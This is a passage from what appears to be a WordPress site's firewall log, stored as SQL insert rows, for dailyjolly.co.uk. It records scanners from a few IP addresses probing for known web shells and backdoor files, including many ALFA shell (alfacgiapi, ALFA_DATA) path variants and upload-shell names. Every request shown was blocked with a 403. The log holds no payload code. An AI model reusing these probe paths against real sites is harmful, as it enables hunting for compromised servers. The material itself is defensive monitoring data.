np4q2ra',0,1674293432.6275,163,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wp-includes/wp-class.php','','{\"1\":\"python-requests\\/2.28.1\"}','PAgk8BOzd0rWThwJQaUMCDov',0,1674293433.5548,182,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wp-includes/fonts/css.php','','{\"1\":\"python-requests\\/2.28.1\"}','HyFEctRLdZKTSkx9YalJn8D5',0,1674293434.4967,203,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/0z.php','','{\"1\":\"python-requests\\/2.28.1\"}','SBgXyep1C4OtzPEIvDNHd2Ja',0,1674293445.0053,172,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wp-content/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko\\/20100101 Firefox\\/103.0\"}','fHXBrAiFJj6VD8KYxQTW2u9L',0,1674293445.9324,206,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wp-content/utchiha-ZKOZ.php','','{\"1\":\"python-requests\\/2.28.1\"}','VdoU49bItiBSevhG3TlgmfaR',0,1674293447.1114,165,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"python-requests\\/2.28.1\"}','FVyhCEKlpRjoAOWG5IY2uJs9',0,1674293448.0458,210,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/lufix.php','','{\"1\":\"python-requests\\/2.28.1\"}','yPoaQzTGpik6mNUlAHxIBVRO',0,1674293449.0483,172,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/upl.php','','{\"1\":\"python-requests\\/2.28.1\"}','iGnf0tWclMko5UQTvg4LadR3',0,1674293449.9987,166,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/upl.php','','{\"1\":\"python-requests\\/2.28.1\"}','bq8mAz1curSh5KFykxwn9pZi',0,1674293450.6954,178,'','POST',403,0,700,0,1,'',0),('217.107.34.211',3647677139,'','https://www.dailyjolly.co.uk/wp-reset.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','VfIWkGJNh8SMj30eugU2rCXF',0,1674303237.6264,3408,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','pTC1xMim3uv9XtEBUQnS7q8O',0,1674312214.5090,316,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','jEg9mn5yraQb3VY6uGXDIvWT',0,1674312215.3902,218,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','zxI4B0Vg68EyDGkvdruYeF7i',0,1674312216.2005,173,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','wuGe2TK1WBtAhQEYSM5afIzb',0,1674312220.1652,185,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','q8ehrlPJtNV13CbKx0d9U4oY',0,1674312220.5815,171,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','sE2i56FtcxrN30HeC8AXTOYZ',0,1674312220.9850,170,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/assets/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','mOSTNC963oWxfjBQzv120KMA',0,1674312225.6577,160,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/assets/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','Vy7e1KakNQ9ZlMpU3wYjtCO2',0,1674312226.1588,156,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/assets/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','LnxDpvrKO3jThuPeVdwoB90U',0,1674312226.5331,171,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/assets/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','CzBTaWVpvEgyG2PZIwFiN8r0',0,1674312232.2856,168,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/assets/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','VW3IqEkFusevdLPziKma0jHt',0,1674312232.6848,163,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/assets/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','kQjBGR9ueCrMZ5xXVw8slyqv',0,1674312233.0620,162,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/upload/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','rEotMuFWGNIT0Xzs1w4Q9mOx',0,1674312238.4702,176,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/upload/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','DUgJNlX92QowPb48uYdzk1L0',0,1674312238.8409,167,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/upload/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','jg6OkeI3d5zXF4hMCpEtmsGw',0,1674312239.2154,157,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/upload/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','FEPqb9lR30JuhCUzerjS7tgc',0,1674312244.2404,189,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/upload/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','gdSI1i0b4XOeP5WBk3rxuM6z',0,1674312244.6359,165,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/upload/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','RoOGmP1WediKLxAUSkCuypIc',0,1674312245.0078,169,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/uploads/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','wF0MZrv3Tp6zHx4afSDQOiXB',0,1674312248.9938,232,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/uploads/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','E3cFeitYbpfykUXGJ47qoIOB',0,1674312249.4310,162,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/uploads/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','91waCSMzJIjFQPX6NqUW82AL',0,1674312249.7992,182,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/uploads/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','cGuhWQSgv5At6ibMkEDXyjxr',0,1674312255.4487,194,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/uploads/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','kD3jCdHLKoFTOcBXlQYhbzst',0,1674312255.8820,157,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/uploads/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','l72TJdc36w9qItopyYWZX8Rs',0,1674312256.2264,164,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/assets/upload/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','uMFeN8VxEwkWGtsnhaYmDdJ9',0,1674312261.9598,166,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/assets/upload/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','A6JqgWTcYZhtbk91yR2zBxDS',0,1674312262.3446,176,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/assets/upload/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','AorfdDJvIUewTXRhZkLMb7ig',0,1674312262.7390,176,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/assets/upload/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','7y4eDW3jh5JpQiz0aFbUEmCK',0,1674312267.8663,156,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/assets/upload/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','wuitCEr9hVjBslp28dR3NUTF',0,1674312268.2053,199,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/assets/upload/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','YvRBCfO5s2ZrpaNL3PmUAgkH',0,1674312268.5864,167,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/assets/uploads/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','2sknWRI13aBcpqNyKCVlSAFL',0,1674312273.1040,165,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/assets/uploads/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','zSwYEflhOsb9M6j7TKgr0Xn3',0,1674312273.4505,161,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/assets/uploads/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','KAzfTw6GOn0katuX1phRYVdF',0,1674312273.8140,183,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/assets/uploads/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','3xTk6OrUYL1cgoKBFdPzV9ne',0,1674312279.3600,188,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/assets/uploads/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','3TIxqMWwmudyKNOoJSZb9P4A',0,1674312279.7935,164,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/assets/uploads/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','qNA1y9tw8fDaseWm6LTVgZ2C',0,1674312280.3665,191,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','ghT2MQWSqALvGPiH9tBkadY8',0,1674312286.1058,207,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','xvqlCU7mFcZGiVN0fkAbX8TS',0,1674312286.5608,163,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','vJoNW2chXaP51jK8wu76lked',0,1674312286.9226,182,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/ALFA_DATA/alfacgiapi/wp-content/uploads/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','cZDoMSR3B5OydsvWikfXrx8z',0,1674312292.7796,167,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/ALFA_DATA/alfacgiapi/wp-content/uploads/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','yh5nGkYWa9m3jg6Hr7d21ef8',0,1674312293.2292,165,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/ALFA_DATA/alfacgiapi/wp-content/uploads/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','x69AzjRqtl1eBSigys8p52CJ',0,1674312293.5809,160,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/uploads/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','oG4vdglYIDrynP980HWjRTZt',0,1674312297.2723,168,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/uploads/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','U7LZXC5EfiBcVkljmOyzrSvG',0,1674312297.6316,189,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/uploads/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','CwaInSqFhTZWyV1jkREgOPm4',0,1674312298.0143,165,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/plugins/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','KXaprWlQt4fSNoJBeFL1wIqc',0,1674312301.7545,184,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/plugins/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','aGU3ycdgT4QEh6SLVKBfzm1Y',0,1674312302.1297,199,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/plugins/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','cwoWXCvSpsbExyfeIrVBQ7NU',0,1674312302.5632,196,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/plugins/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','KEVO7Ilq2domk0WiM9ALrYPU',0,1674312307.0165,169,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/plugins/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','XuSo5D0E4WclbVLtgU9JHaK8',0,1674312307.3983,168,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/plugins/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','gT0PrwyOMvxDe34WAnGcVizh',0,1674312307.9005,184,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/themes/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','kMqBc4mONG5X3WRtvZrxwloA',0,1674312311.2948,188,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/themes/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','yc8ijVsz37BfKv1DHWYGohma',0,1674312311.6649,536,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/themes/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','FwvbYZUTLuChExAJimVoHzKD',0,1674312312.3933,177,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/themes/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile 